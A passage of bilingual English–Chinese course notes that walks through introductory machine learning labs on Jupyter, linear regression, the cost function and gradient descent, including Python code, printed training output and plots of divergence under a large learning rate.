    现在可以计算梯度,上面等式(3)中描述的梯度下降可以在下面的gradient_descent中实现。注释中描述了实现的详细信息。下面,您将利用此函数在训练数据上找到 $w$ 和 $b$ 的最佳值。

def gradient_descent(x, y, w_in, b_in, alpha, num_iters, cost_function, gradient_function):
    """
    Performs gradient descent to fit w,b. Updates w,b by taking
    num_iters gradient steps with learning rate alpha
    执行梯度下降以拟合 w,b:以学习率 alpha 走 num_iters 步梯度更新 w,b

    Args:
      x (ndarray (m,))  : Data, m examples 训练集,m 个样本
      y (ndarray (m,))  : target values 目标值
      w_in,b_in (scalar): initial values of model parameters 模型参数的初始值
      alpha (float)     : Learning rate 学习率
      num_iters (int)   : number of iterations to run gradient descent 运行梯度下降的迭代次数
      cost_function     : function to call to produce cost 用于计算成本的函数
      gradient_function : function to call to produce gradient 用于计算梯度的函数

    Returns:
      w (scalar): Updated value of parameter after running gradient descent 运行梯度下降后更新的参数值
      b (scalar): Updated value of parameter after running gradient descent
      J_history (List): History of cost values
      p_history (list): History of parameters [w,b]
    """

    w = copy.deepcopy(w_in)  # avoid modifying global w_in 避免修改全局 w_in
    # An array to store cost J and w's at each iteration primarily for graphing later
    # 用于在每次迭代时记录成本 J 和参数,主要供之后绘图使用
    J_history = []
    p_history = []
    b = b_in
    w = w_in

    for i in range(num_iters):
        # Calculate the gradient and update the parameters using gradient_function
        # 用 gradient_function 计算梯度并更新参数
        dj_dw, dj_db = gradient_function(x, y, w, b)

        # Update Parameters using equation (3) above
        # 使用上面的等式(3)更新参数
        b = b - alpha * dj_db
        w = w - alpha * dj_dw

        # Save cost J at each iteration
        # 每次迭代记录成本 J
        if i < 100000:  # prevent resource exhaustion 防止资源耗尽
            J_history.append(cost_function(x, y, w, b))
            p_history.append([w, b])
        # Print cost at 10 evenly spaced intervals (or every iteration if num_iters < 10)
        # 每迭代总次数的 1/10 打印一次成本(若总次数小于 10,则每次都打印)
        if i % math.ceil(num_iters / 10) == 0:
            print(f"Iteration {i:4}: Cost {J_history[-1]:0.2e} ",
                  f"dj_dw: {dj_dw: 0.3e}, dj_db: {dj_db: 0.3e}  ",
                  f"w: {w: 0.3e}, b:{b: 0.5e}")

    return w, b, J_history, p_history  # return w and J,w history for graphing
    # initialize parameters
    w_init = 0
    b_init = 0
    # some gradient descent settings
    iterations = 10000
    tmp_alpha = 1.0e-2
    # run gradient descent
w_final, b_final, J_hist, p_hist = gradient_descent(x_train, y_train, w_init, b_init, tmp_alpha,
                                                    iterations, compute_cost, compute_gradient)
    print(f"(w,b) found by gradient descent: ({w_final:8.4f},{b_final:8.4f})")
Iteration    0: Cost 7.93e+04  dj_dw: -6.500e+02, dj_db: -4.000e+02   w:  6.500e+00, b: 4.00000e+00
Iteration 1000: Cost 3.41e+00  dj_dw: -3.712e-01, dj_db:  6.007e-01   w:  1.949e+02, b: 1.08228e+02
Iteration 2000: Cost 7.93e-01  dj_dw: -1.789e-01, dj_db:  2.895e-01   w:  1.975e+02, b: 1.03966e+02
Iteration 3000: Cost 1.84e-01  dj_dw: -8.625e-02, dj_db:  1.396e-01   w:  1.988e+02, b: 1.01912e+02
Iteration 4000: Cost 4.28e-02  dj_dw: -4.158e-02, dj_db:  6.727e-02   w:  1.994e+02, b: 1.00922e+02
Iteration 5000: Cost 9.95e-03  dj_dw: -2.004e-02, dj_db:  3.243e-02   w:  1.997e+02, b: 1.00444e+02
Iteration 6000: Cost 2.31e-03  dj_dw: -9.660e-03, dj_db:  1.563e-02   w:  1.999e+02, b: 1.00214e+02
Iteration 7000: Cost 5.37e-04  dj_dw: -4.657e-03, dj_db:  7.535e-03   w:  1.999e+02, b: 1.00103e+02
Iteration 8000: Cost 1.25e-04  dj_dw: -2.245e-03, dj_db:  3.632e-03   w:  2.000e+02, b: 1.00050e+02
Iteration 9000: Cost 2.90e-05  dj_dw: -1.082e-03, dj_db:  1.751e-03   w:  2.000e+02, b: 1.00024e+02
(w,b) found by gradient descent: (199.9929,100.0116)

    png
    Take a moment and note some characteristics of the gradient descent process printed above.

花点时间注意上面打印的梯度下降过程的一些特征。

• The cost starts large and rapidly declines as described in the slide from the lecture.
  • 成本一开始很大,随后迅速下降,正如课程幻灯片中所描述的那样。
• The partial derivatives, dj_dw, and dj_db also get smaller, rapidly at first and then more slowly. As shown in the diagram from the lecture, as the process nears the 'bottom of the bowl' progress is slower due to the smaller value of the derivative at that point.
  • 偏导数 dj_dwdj_db 也会变小,先快后慢。如课程图示所示,当过程接近"碗底"时,由于该处导数的值更小,进展会变慢。
• progress slows though the learning rate, alpha, remains fixed
  • 尽管学习率 alpha 保持不变,进展仍会变慢

    Cost versus iterations of gradient descent 梯度下降的成本 VS 迭代

A plot of cost versus iterations is a useful measure of progress in gradient descent. Cost should always decrease in successful runs. The change in cost is so rapid initially, it is useful to plot the initial descent on a different scale than the final descent. In the plots below, note the scale of cost on the axes and the iteration step.

成本与迭代次数的关系图是衡量梯度下降进展的有用手段。在成功的运行中,成本应当一直下降。成本在最初变化得非常快,因此把初始阶段的下降和最终阶段的下降画在不同的尺度上是有用的。在下面的图中,请注意坐标轴上成本的尺度和迭代步数。

    # plot cost versus iteration  
    fig, (ax1, ax2) = plt.subplots(1, 2, constrained_layout=True, figsize=(12,4))
    ax1.plot(J_hist[:100])
    ax2.plot(1000 + np.arange(len(J_hist[1000:])), J_hist[1000:])
    ax1.set_title("Cost vs. iteration(start)"); ax2.set_title("Cost vs. iteration (end)")
    ax1.set_ylabel('Cost') ; ax2.set_ylabel('Cost')
    ax1.set_xlabel('iteration step') ; ax2.set_xlabel('iteration step')
    plt.show()

    png

    Predictions 预测

Now that you have discovered the optimal values for the parameters $w$ and $b$, you can now use the model to predict housing values based on our learned parameters. As expected, the predicted values are nearly the same as the training values for the same housing. Further, the value not in the training set is in line with the expected value.

现在您已经找到了参数 $w$ 和 $b$ 的最优值,就可以用该模型根据学到的参数预测房价了。正如预期的那样,对训练集中房屋的预测值与训练值几乎相同;此外,对不在训练集中的取值(1200 平方英尺)的预测也符合预期。

    print(f"1000sqft house prediction {w_final*1.0 + b_final:0.1f} Thousand dollars")
    print(f"1200sqft house prediction {w_final*1.2 + b_final:0.1f} Thousand dollars")
    print(f"2000sqft house prediction {w_final*2.0 + b_final:0.1f} Thousand dollars")
1000sqft house prediction 300.0 Thousand dollars
1200sqft house prediction 340.0 Thousand dollars
2000sqft house prediction 500.0 Thousand dollars

    Plotting

You can show the progress of gradient descent during its execution by plotting the cost over iterations on a contour plot of the cost(w,b).

您可以在成本 cost(w,b) 的等高线图上绘制各次迭代的成本,以显示梯度下降执行过程中的进展。

    fig, ax = plt.subplots(1,1, figsize=(12, 6))
    plt_contour_wgrad(x_train, y_train, p_hist, ax)

    png

Above, the contour plot shows the $cost(w,b)$ over a range of $w$ and $b$. Cost levels are represented by the rings. Overlaid, using red arrows, is the path of gradient descent. Here are some things to note:

• The path makes steady (monotonic) progress toward its goal.
• initial steps are much larger than the steps near the goal.

上面的等高线图显示了一段 $w$ 和 $b$ 取值范围内的 $cost(w,b)$,成本的水平由圆环表示;用红色箭头叠加显示的是梯度下降的路径。以下是一些需要注意的事项:

• 这条路径朝着它的目标稳步(单调)前进。
• 初始的步子比接近目标时的步子大得多。

Zooming in, we can see the final steps of gradient descent. Note the distance between steps shrinks as the gradient approaches zero.

放大后,我们可以看到梯度下降的最后几步。请注意,随着梯度接近零,步与步之间的距离会缩小。

    fig, ax = plt.subplots(1,1, figsize=(12, 4))
    plt_contour_wgrad(x_train, y_train, p_hist, ax, w_range=[180, 220, 0.5], b_range=[80, 120, 0.5],
    contours=[1,5,10,20],resolution=0.5)

    png

    Increased Learning Rate

    png

In the lecture, there was a discussion related to the proper value of the learning rate, $\alpha$ in equation(3). The larger $\alpha$ is, the faster gradient descent will converge to a solution. But, if it is too large, gradient descent will diverge. Above you have an example of a solution which converges nicely.

Let's try increasing the value of $\alpha$ and see what happens:

在课程中讨论过等式(3)中学习率 $\alpha$ 的合适取值。$\alpha$ 越大,梯度下降收敛到解的速度就越快;但如果太大,梯度下降就会发散。上面是一个收敛得很好的例子。
让我们尝试增大 $\alpha$ 的值,看看会发生什么:

    # initialize parameters
    w_init = 0
    b_init = 0
    # set alpha to a large value
    iterations = 10
    tmp_alpha = 8.0e-1
    # run gradient descent
    w_final, b_final, J_hist, p_hist = gradient_descent(x_train ,y_train, w_init, b_init, tmp_alpha,
    iterations, compute_cost, compute_gradient)
Iteration    0: Cost 2.58e+05  dj_dw: -6.500e+02, dj_db: -4.000e+02   w:  5.200e+02, b: 3.20000e+02
Iteration    1: Cost 7.82e+05  dj_dw:  1.130e+03, dj_db:  7.000e+02   w: -3.840e+02, b:-2.40000e+02
Iteration    2: Cost 2.37e+06  dj_dw: -1.970e+03, dj_db: -1.216e+03   w:  1.192e+03, b: 7.32800e+02
Iteration    3: Cost 7.19e+06  dj_dw:  3.429e+03, dj_db:  2.121e+03   w: -1.551e+03, b:-9.63840e+02
Iteration    4: Cost 2.18e+07  dj_dw: -5.974e+03, dj_db: -3.691e+03   w:  3.228e+03, b: 1.98886e+03
Iteration    5: Cost 6.62e+07  dj_dw:  1.040e+04, dj_db:  6.431e+03   w: -5.095e+03, b:-3.15579e+03
Iteration    6: Cost 2.01e+08  dj_dw: -1.812e+04, dj_db: -1.120e+04   w:  9.402e+03, b: 5.80237e+03
Iteration    7: Cost 6.09e+08  dj_dw:  3.156e+04, dj_db:  1.950e+04   w: -1.584e+04, b:-9.80139e+03
Iteration    8: Cost 1.85e+09  dj_dw: -5.496e+04, dj_db: -3.397e+04   w:  2.813e+04, b: 1.73730e+04
Iteration    9: Cost 5.60e+09  dj_dw:  9.572e+04, dj_db:  5.916e+04   w: -4.845e+04, b:-2.99567e+04

    Above, $w$ and $b$ are bouncing back and forth between positive and negative with the absolute value increasing with each iteration. Further, each iteration $\frac{\partial J(w,b)}{\partial w}$ changes sign and cost is increasing rather than decreasing. This is a clear sign that the learning rate is too large and the solution is diverging.
    Let’s visualize this with a plot.

上面,$w$ 和 $b$ 在正负之间来回跳动,绝对值随每次迭代而增大。此外,每次迭代 $\frac{\partial J(w,b)}{\partial w}$ 都会改变符号,而且成本在增加而不是减少。这清楚地表明学习率太大,解正在发散。让我们用图把它可视化。

    plt_divergence(p_hist, J_hist,x_train, y_train)
    plt.show()
---------------------------------------------------------------------------
OverflowError                             Traceback (most recent call last)
Input In [16], in <cell line: 1>()
----> 1 plt_divergence(p_hist, J_hist,x_train, y_train)
      2 plt.show()

File ~\Jupyter\吴恩达-ML\week1\work\lab_utils_uni.py:305, in plt_divergence(p_hist, J_hist, x_train, y_train)
    303 for i in range(len(w_array)):
    304     tmp_w = w_array[i]
--> 305     cost[i] = compute_cost(x_train, y_train, tmp_w, fix_b)
    307 ax.plot(w_array, cost)
    308 ax.plot(x,v, c=dlmagenta)

OverflowError: Python int too large to convert to C long

    png

    Above, the left graph shows $w$'s progression over the first few steps of gradient descent. $w$ oscillates from positive to negative and cost grows rapidly. Gradient Descent is operating on both $w$ and $b$ simultaneously, so one needs the 3-D plot on the right for the complete picture.

上面的左图显示了 $w$ 在梯度下降前几步中的变化。$w$ 在正负之间振荡,成本迅速增长。梯度下降同时作用于 $w$ 和 $b$,因此需要右侧的 3D 图才能看到完整的图像。

    Congratulations!

    In this lab you:

    • delved into the details of gradient descent for a single variable.
    • developed a routine to compute the gradient
    • visualized what the gradient is
    • completed a gradient descent routine
    • utilized gradient descent to find parameters
    • examined the impact of sizing the learning rate

在本实验中,您:

    • 深入研究单个变量的梯度下降细节。
    • 开发了一个例程来计算梯度
    • 可视化梯度是什么
    • 完成梯度下降例程
    • 利用梯度下降来查找参数
    • 研究了调整学习率的影响
    ]]> + 资源

    Week1

    Optional Lab: Brief Introduction to Python and Jupyter Notebooks

    可选实验:对 Python 与 Jupyter Notebooks 作简短的介绍。

    Welcome to the first optional lab!

    欢迎来到第一次可选实验!

    Optional labs are available to:

    可选实验的用处:

    • provide information - like this notebook

      • 提供信息——像这个笔记本
    • reinforce lecture material with hands-on examples

      • 对上手实例提供更好的课程工具
    • provide working examples of routines used in the graded labs

      • 提供作业实例用于各个实验

    Goals

    目标

    In this lab, you will:

    在这次实验中,你将:

    • Get a brief introduction to Jupyter notebooks

      • 获得对 Jupyter notebooks 的简短介绍
    • Take a tour of Jupyter notebooks

      • 体验一次 Jupyter notebooks
    • Learn the difference between markdown cells and code cells

      • 了解到 markdown cells 与 code cells 的区别
    • Practice some basic python

      • 练习一些基础 Python 知识

    The easiest way to become familiar with Jupyter notebooks is to take the tour available above in the Help menu:

    熟悉 Jupyter notebooks 最简单的方法就是点击 Help 菜单栏中的 User Interface Tour(用户导览)选项

    png

    Jupyter notebooks have two types of cells that are used in this course. Cells such as this which contain documentation called Markdown Cells. The name is derived from the simple formatting language used in the cells. You will not be required to produce markdown cells. Its useful to understand the cell pulldown shown in graphic below. Occasionally, a cell will end up in the wrong mode and you may need to restore it to the right state:

    在这个资源中,使用到了 Jupyter notebooks 的两种类型的片段。包含文档信息的片段被称之为 Markdown Cells。这个片段命名来自于其使用的简洁格式语言。你并不被要求创建 markdown cells。但这对你理解下面的cell pulldown 很有帮助。有时,单元格会以错误的模式结束,您可能需要将其恢复到正确的状态:

    png

    The other type of cell is the code cell where you will write your code:

    另一种类型的片段被称之为 code cell,你可以在这里撰写你的代码:

    1
    2
    #This is  a 'Code' Cell
    print("This is code cell")
    This is  code cell

    Python

    You can write your code in the code cells.

    你可以在 code cells 中撰写你的代码,

    To run the code, select the cell and either

    要想运行代码,选择这个片段并:

    • hold the shift-key down and hit ‘enter’ or ‘return’
      • 按下 Shift+Enter(或 Return)键
    • click the ‘run’ arrow above
      • 点击 run 按钮

    png

    输出结果

    Print statements will generally use the python f-string style.

    输出结果默认使用 python 的 f-string 风格

    Try creating your own print in the following cell.

    尝试在下面这个片段创建你自己的输出。

    Try both methods of running the cell.

    尝试两种方法运行这个片段。

    1
    2
    3
    # print statements
    variable = "right in the strings!"
    print(f"f strings allow you to embed variables {variable}")
    f strings allow you to embed variables right in the strings!

    Congratulations!

    恭喜!

    You now know how to find your way around a Jupyter Notebook.

    你知道了怎么使用 Jupyter Notebook。


    Optional Lab: Model Representation

    png

    Goals

    In this lab you will:
    在这次实验中你将:

    • Learn to implement the model $f_{w,b}$ for linear regression with one variable
      学习实现单变量线性回归

    Notation

    Here is a summary of some of the notation you will encounter.
    以下是您将遇到的一些符号的摘要.

    General Notation
    一般表示法
    Description
    描述
    Python
    (if applicable 如果适用)
    $a$scalar, non bold 标量,非粗体
    $\mathbf{a}$vector, bold 向量,粗体
    Regression 回归
    $\mathbf{x}$Training Example feature values (in this lab - Size (1000sqft)) 训练示例特征值(在本练习中 - 大小(1000 平方英尺))x_train
    $\mathbf{y}$Training Example targets (in this lab Price (1000s of dollars)). 训练示例目标(在本练习中为价格(1000 美元))。y_train
    $x^{(i)}$, $y^{(i)}$$i_{th}$Training Example 训练示例x_i, y_i
    mNumber of training examples 训练示例数量m
    $w$parameter: weight, 参数:斜率w
    $b$parameter: bias 参数:截距b
    $f_{w,b}(x^{(i)})$The result of the model evaluation at $x^{(i)}$ parameterized by $w,b$: $f_{w,b}(x^{(i)}) = wx^{(i)}+b$f_wb

    Tools

    In this lab you will make use of:

    • NumPy, a popular library for scientific computing
    • Matplotlib, a popular library for plotting data
    1
    2
    3
    import numpy as np
    import matplotlib.pyplot as plt
    plt.style.use('./deeplearning.mplstyle')

    Problem Statement

    png

    As in the lecture, you will use the motivating example of housing price prediction.
    This lab will use a simple data set with only two data points - a house with 1000square feet(sqft) sold for $300,000 and a house with 2000square feet sold for $500,000. These two points will constitute our data or training set. In this lab, the units of size are 1000sqft and the units of price are 1000s of dollars.

    与课堂一样,您将使用房价预测的激励性示例。
    本实验将使用一个只有两个数据点的简单数据集 - 一个以$300,000 出售的 1000 平方英尺的房子和一个以$500,000 出售的 2000 平方英尺的房子。这两点将构成我们的数据或训练集。在这个实验室中,大小单位是 1000 平方英尺,价格单位是 1000 美元。

    Size (1000sqft)Price (1000s of dollars)
    1.0300
    2.0500

    You would like to fit a linear regression model (shown above as the blue straight line) through these two points, so you can then predict price for other houses - say, a house with 1200sqft.

    您希望通过这两个点拟合线性回归模型(如上图所示为蓝色直线),以便您可以预测其他房屋的价格 - 例如,1200 平方英尺的房屋。

    Please run the following code cell to create your x_train and y_train variables. The data is stored in one-dimensional NumPy arrays.

    请运行以下代码单元以创建“x_train”和“y_train”变量。数据存储在一维 NumPy 数组中。

    1
    2
    3
    4
    5
    6
    # x_train is the input variable (size in 1000square feet)
    # y_train is the target (price in 1000s of dollars)
    x_train = np.array([1.0, 2.0])
    y_train = np.array([300.0, 500.0])
    print(f"x_train = {x_train}")
    print(f"y_train = {y_train}")
    x_train = [1. 2.]y_train = [300. 500.]

    Note: The course will frequently utilize the python ‘f-string’ output formatting described here when printing. The content between the curly braces is evaluated when producing the output.

    注意:本课程在打印时将经常使用此处描述的 python“f-string”输出格式。生成输出时,将计算大括号之间的内容。

    Number of training examples m

You will use m to denote the number of training examples. NumPy arrays have a .shape attribute. x_train.shape returns a Python tuple with an entry for each dimension. x_train.shape[0] is the length of the array and the number of examples, as shown below.

# m is the number of training examples
print(f"x_train.shape: {x_train.shape}")
m = x_train.shape[0]
print(f"Number of training examples is: {m}")

x_train.shape: (2,)
Number of training examples is: 2

    One can also use the Python len() function as shown below.

    # m is the number of training examples
    m = len(x_train)
    print(f"Number of training examples is: {m}")
    Number of training examples is: 2

    Training example x_i, y_i

You will use (x$^{(i)}$, y$^{(i)}$) to denote the $i^{th}$ training example. Since Python is zero-indexed, (x$^{(0)}$, y$^{(0)}$) is (1.0, 300.0) and (x$^{(1)}$, y$^{(1)}$) is (2.0, 500.0).

To access a value in a NumPy array, one indexes the array with the desired offset. For example, the syntax to access location zero of x_train is x_train[0].
Run the next code block below to get the $i^{th}$ training example.

    i = 0 # Change this to 1 to see (x^1, y^1)

    x_i = x_train[i]
    y_i = y_train[i]
    print(f"(x^({i}), y^({i})) = ({x_i}, {y_i})")
    (x^(0), y^(0)) = (1.0, 300.0)
    i = 1

    x_i = x_train[i]
    y_i = y_train[i]
    print(f"(x^({i}), y^({i})) = ({x_i}, {y_i})")
    (x^(1), y^(1)) = (2.0, 500.0)

Plotting the data

    You can plot these two points using the scatter() function in the matplotlib library, as shown in the cell below.

• The function arguments marker and c show the points as red crosses (the default is blue dots).

You can use other functions in the matplotlib library to set the title and labels to display.

    # Plot the data points
    plt.scatter(x_train, y_train, marker='x', c='r')
    # Set the title
    plt.title("Housing Prices")
    # Set the y-axis label
    plt.ylabel('Price (in 1000s of dollars)')
    # Set the x-axis label
    plt.xlabel('Size (1000sqft)')
    plt.show()


Model function


    As described in lecture, the model function for linear regression (which is a function that maps from x to y) is represented as


    $$ f_{w,b}(x^{(i)}) = wx^{(i)} + b \tag{1}$$

The formula above is how you can represent straight lines - different values of $w$ and $b$ give you different straight lines on the plot.

Let’s try to get a better intuition for this through the code blocks below. Let’s start with $w = 100$ and $b = 100$.

Note: You can come back to this cell to adjust the model’s w and b parameters.

w = 100
b = 100
print(f"w: {w}")
print(f"b: {b}")

w: 100
b: 100

Now, let’s compute the value of $f_{w,b}(x^{(i)})$ for your two data points. You can explicitly write this out for each data point as:

    for $x^{(0)}$, f_wb = w * x[0] + b

    for $x^{(1)}$, f_wb = w * x[1] + b

For a large number of data points, this can get unwieldy and repetitive. So instead, you can calculate the function output in a for loop as shown in the compute_model_output function below.

Note: The argument description (ndarray (m,)) describes a NumPy n-dimensional array of shape (m,). (scalar) describes an argument without dimensions, just a magnitude.

Note: np.zeros(n) will return a one-dimensional NumPy array with $n$ entries.
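For example, a quick scratch check (illustrative only):

print(np.zeros(4))
print(np.zeros(4).shape)

[0. 0. 0. 0.]
(4,)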

def compute_model_output(x, w, b):
    """
    Computes the prediction of a linear model
    Args:
      x (ndarray (m,)): Data, m examples
      w,b (scalar)    : model parameters
    Returns
      f_wb (ndarray (m,)): model predictions
    """
    m = x.shape[0]
    f_wb = np.zeros(m)
    for i in range(m):
        f_wb[i] = w * x[i] + b

    return f_wb

    Now let’s call the compute_model_output function and plot the output.


tmp_f_wb = compute_model_output(x_train, w, b)

    # Plot our model prediction
    plt.plot(x_train, tmp_f_wb, c='b',label='Our Prediction')

    # Plot the data points
    plt.scatter(x_train, y_train, marker='x', c='r',label='Actual Values')

    # Set the title
    plt.title("Housing Prices")
    # Set the y-axis label
    plt.ylabel('Price (in 1000s of dollars)')
    # Set the x-axis label
    plt.xlabel('Size (1000sqft)')
    plt.legend()
    plt.show()


    As you can see, setting $w = 100$ and $b = 100$ does not result in a line that fits our data.


Challenge

    Try experimenting with different values of $w$ and $b$. What should the values be for a line that fits our data?


    Tip:

You can click on the triangle to the left of the green “Hints” below to reveal some hints for choosing b and w.

    Hints

    • Try $w = 200$ and $b = 100$
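A quick way to verify the hint before re-plotting, using the compute_model_output function defined above (a scratch cell):

tmp_f_wb = compute_model_output(x_train, 200, 100)
print(tmp_f_wb)

[300. 500.]

The predictions match y_train exactly, so the line passes through both data points.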

    Prediction

Now that we have a model, we can use it to make our original prediction. Let’s predict the price of a house with 1200 sqft. Since the units of $x$ are 1000s of sqft, $x$ is 1.2.

    w = 200                         
    b = 100
    x_i = 1.2
    cost_1200sqft = w * x_i + b

    print(f"${cost_1200sqft:.0f} thousand dollars")
    $340 thousand dollars

    Congratulations!

In this lab you have learned:

• Linear regression builds a model which establishes a relationship between features and targets
  • In the example above, the feature was house size and the target was house price
  • For simple linear regression, the model has two parameters $w$ and $b$ whose values are ‘fit’ using training data.
  • Once a model’s parameters have been determined, the model can be used to make predictions on novel data.

    Optional Lab: Cost Function


    Goals

In this lab you will:

• implement and explore the cost function for linear regression with one variable.

    Tools

In this lab we will make use of:

• NumPy, a popular library for scientific computing
• Matplotlib, a popular library for plotting data
• local plotting routines in the lab_utils_uni.py file in the local directory

import numpy as np
%matplotlib widget
import matplotlib.pyplot as plt
from lab_utils_uni import plt_intuition, plt_stationary, plt_update_onclick, soup_bowl
plt.style.use('./deeplearning.mplstyle')

    Problem Statement

You would like a model which can predict housing prices given the size of the house.
Let’s use the same two data points as in the previous lab: a house with 1000 square feet sold for $300,000 and a house with 2000 square feet sold for $500,000.

Size (1000 sqft) | Price (1000s of dollars)
1 | 300
2 | 500

x_train = np.array([1.0, 2.0])      # (size in 1000 square feet)
y_train = np.array([300.0, 500.0])  # (price in 1000s of dollars)

    Computing Cost

The term ‘cost’ in this assignment might be a little confusing since the data is housing cost. Here, cost is a measure of how well our model is predicting the target price of the house. The term ‘price’ is used for the housing data.

The equation for cost with one variable is:
$$J(w,b) = \frac{1}{2m} \sum\limits_{i = 0}^{m-1} (f_{w,b}(x^{(i)}) - y^{(i)})^2 \tag{1}$$

where
$$f_{w,b}(x^{(i)}) = wx^{(i)} + b \tag{2}$$

• $f_{w,b}(x^{(i)})$ is our prediction for example $i$ using parameters $w,b$.
• $(f_{w,b}(x^{(i)}) - y^{(i)})^2$ is the squared difference between the target value and the prediction.
• These differences are summed over all the $m$ examples and divided by $2m$ to produce the cost, $J(w,b)$.

Note: in lecture, summation ranges are typically from 1 to m, while in code they run from 0 to m-1.

    The code below calculates cost by looping over each example. In each loop:

• f_wb, a prediction, is calculated
• the difference between the target and the prediction is calculated and squared.
• this is added to the total cost.

def compute_cost(x, y, w, b):
    """
    Computes the cost function for linear regression.

    Args:
      x (ndarray (m,)): Data, m examples
      y (ndarray (m,)): target values
      w,b (scalar)    : model parameters

    Returns
      total_cost (float): The cost of using w,b as the parameters for linear regression
                          to fit the data points in x and y
    """
    # number of training examples
    m = x.shape[0]

    cost_sum = 0
    for i in range(m):
        f_wb = w * x[i] + b
        cost = (f_wb - y[i]) ** 2
        cost_sum = cost_sum + cost
    total_cost = (1 / (2 * m)) * cost_sum

    return total_cost
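As an aside, the same quantity can be computed without the explicit loop using NumPy vectorized arithmetic; a minimal sketch (equivalent to equation (1), not part of the original lab):

def compute_cost_vectorized(x, y, w, b):
    # w * x + b evaluates the model on all m examples at once;
    # the mean of the squared errors, halved, is exactly equation (1)
    return np.mean((w * x + b - y) ** 2) / 2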

    Cost Function Intuition

    Your goal is to find a model $f_{w,b}(x) = wx + b$, with parameters $w,b$, which will accurately predict house values given an input $x$. The cost is a measure of how accurate the model is on the training data.

The cost equation (1) above shows that if $w$ and $b$ can be selected such that the predictions $f_{w,b}(x)$ match the target data $y$, the $(f_{w,b}(x^{(i)}) - y^{(i)})^2$ term will be zero and the cost minimized. In this simple two-point example, you can achieve this!

    In the previous lab, you determined that $b=100$ provided an optimal solution so let’s set $b$ to 100 and focus on $w$.


    Below, use the slider control to select the value of $w$ that minimizes cost. It can take a few seconds for the plot to update.

(The interactive widget doesn’t render here, orz.)

    plt_intuition(x_train,y_train)
    interactive(children=(IntSlider(value=150, description='w', max=400, step=10), Output()), _dom_classes=('widge…

The plot contains a few points that are worth mentioning.

• cost is minimized when $w = 200$, which matches results from the previous lab
• Because the difference between the target and prediction is squared in the cost equation, the cost increases rapidly when $w$ is either too large or too small.
• Using the w and b selected by minimizing cost results in a line which is a perfect fit to the data.
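You can confirm the first point directly with the compute_cost function defined above (a scratch cell):

print(compute_cost(x_train, y_train, 200, 100))
print(compute_cost(x_train, y_train, 100, 100))

0.0
12500.0

At $w=200$, $b=100$ the predictions hit both targets exactly, so the cost is zero.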

Cost Function Visualization - 3D

    You can see how cost varies with respect to both w and b by plotting in 3D or using a contour plot.
    It is worth noting that some of the plotting in this course can become quite involved. The plotting routines are provided and while it can be instructive to read through the code to become familiar with the methods, it is not needed to complete the course successfully. The routines are in lab_utils_uni.py in the local directory.


    Larger Data Set

It is instructive to view a scenario with a few more data points. This data set includes points that do not fall on the same line. What does that mean for the cost equation? Can we find $w$ and $b$ that will give us a cost of 0?

x_train = np.array([1.0, 1.7, 2.0, 2.5, 3.0, 3.2])
y_train = np.array([250, 300, 480, 430, 630, 730])

    In the contour plot, click on a point to select w and b to achieve the lowest cost. Use the contours to guide your selections. Note, it can take a few seconds to update the graph.


    plt.close('all') 
    fig, ax, dyn_items = plt_stationary(x_train, y_train)
    updater = plt_update_onclick(fig, ax, x_train, y_train, dyn_items)


    Above, note the dashed lines in the left plot. These represent the portion of the cost contributed by each example in your training set. In this case, values of approximately $w=209$ and $b=2.4$ provide low cost. Note that, because our training examples are not on a line, the minimum cost is not zero.

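Again, compute_cost makes the point concrete (a scratch cell; x_train and y_train now hold the six-point data set):

# low cost, but not zero: the six points are not collinear
print(compute_cost(x_train, y_train, 209, 2.4))  # -> about 1736.3, well above zero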

Convex Cost Surface

    The fact that the cost function squares the loss ensures that the ‘error surface’ is convex like a soup bowl. It will always have a minimum that can be reached by following the gradient in all dimensions. In the previous plot, because the $w$ and $b$ dimensions scale differently, this is not easy to recognize. The following plot, where $w$ and $b$ are symmetric, was shown in lecture:


    soup_bowl()


    Congratulations!

    You have learned the following:

    • The cost equation provides a measure of how well your predictions match your training data.
    • Minimizing the cost can provide optimal values of $w$, $b$.


    Optional Lab: Gradient Descent for Linear Regression


    Goals

    In this lab, you will:

    • automate the process of optimizing $w$ and $b$ using gradient descent.

    Tools

    In this lab, we will make use of:

    • NumPy, a popular library for scientific computing
    • Matplotlib, a popular library for plotting data
• plotting routines in the lab_utils_uni.py file in the local directory
    import math, copy
    import numpy as np
    import matplotlib.pyplot as plt
    plt.style.use('./deeplearning.mplstyle')
    from lab_utils_uni import plt_house_x, plt_contour_wgrad, plt_divergence, plt_gradients
!ls -al

'ls' is not recognized as an internal or external command, operable program or batch file.

    Problem Statement

Let’s use the same two data points as before - a house with 1000 square feet sold for $300,000 and a house with 2000 square feet sold for $500,000.

Size (1000 sqft) | Price (1000s of dollars)
1 | 300
2 | 500

# Load our data set
x_train = np.array([1.0, 2.0])      # features
y_train = np.array([300.0, 500.0])  # target value

    Compute_Cost

    This was developed in the last lab. We’ll need it again here.

#Function to calculate the cost
def compute_cost(x, y, w, b):

    m = x.shape[0]
    cost = 0

    for i in range(m):
        f_wb = w * x[i] + b
        cost = cost + (f_wb - y[i])**2
    total_cost = 1 / (2 * m) * cost

    return total_cost

    Gradient descent summary

    So far in this course, you have developed a linear model that predicts $f_{w,b}(x^{(i)})$:


    $$f_{w,b}(x^{(i)}) = wx^{(i)} + b \tag{1}$$
In linear regression, you utilize input training data to fit the parameters $w$,$b$ by minimizing a measure of the error between our predictions $f_{w,b}(x^{(i)})$ and the actual data $y^{(i)}$. The measure is called the $cost$, $J(w,b)$. In training you measure the cost over all of our training samples $x^{(i)},y^{(i)}$:

$$J(w,b) = \frac{1}{2m} \sum\limits_{i = 0}^{m-1} (f_{w,b}(x^{(i)}) - y^{(i)})^2\tag{2}$$

    In lecture, gradient descent was described as:


$$\begin{align*} \text{repeat}&\text{ until convergence:} \; \lbrace \newline
\; w &= w - \alpha \frac{\partial J(w,b)}{\partial w} \tag{3} \; \newline
b &= b - \alpha \frac{\partial J(w,b)}{\partial b} \newline \rbrace
\end{align*}$$

where the parameters $w$, $b$ are updated simultaneously.

    The gradient is defined as:


$$
\begin{align}
\frac{\partial J(w,b)}{\partial w} &= \frac{1}{m} \sum\limits_{i = 0}^{m-1} (f_{w,b}(x^{(i)}) - y^{(i)})x^{(i)} \tag{4}\\
\frac{\partial J(w,b)}{\partial b} &= \frac{1}{m} \sum\limits_{i = 0}^{m-1} (f_{w,b}(x^{(i)}) - y^{(i)}) \tag{5}\\
\end{align}
$$
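Equations (4) and (5) come from differentiating equation (2) term by term with the chain rule; sketching the $w$ case (a short derivation added here for completeness, not in the original lab):

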